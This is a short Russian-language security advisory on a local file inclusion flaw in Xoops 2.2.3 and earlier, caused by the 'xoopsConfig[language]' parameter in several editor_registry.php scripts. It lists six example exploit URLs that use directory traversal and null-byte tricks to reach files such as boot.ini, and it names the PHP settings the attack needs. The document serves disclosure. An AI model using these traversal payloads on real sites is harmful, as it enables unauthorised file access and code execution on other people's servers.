Программа: Xoops 2.2.3 и более ранние версии
Уязвимость позволяет удаленному пользователю просмотреть или выполнить произвольные локальные файлы на системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "xoopsConfig[language]" в сценарии "class/xoopseditor/textarea/editor_registry.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный локальный файл на системе.
Пример:
http://[target]/[path_to_xoops]/class/xoopseditor/ textarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/ textarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/ koivi/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/ koivi/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/ dhtmltextarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/ dhtmltextarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00
Для успешной эксплуатации уязвимости, опция "magic_quotes_gpc" должна быть выключена, а опция “register_globals” - включена.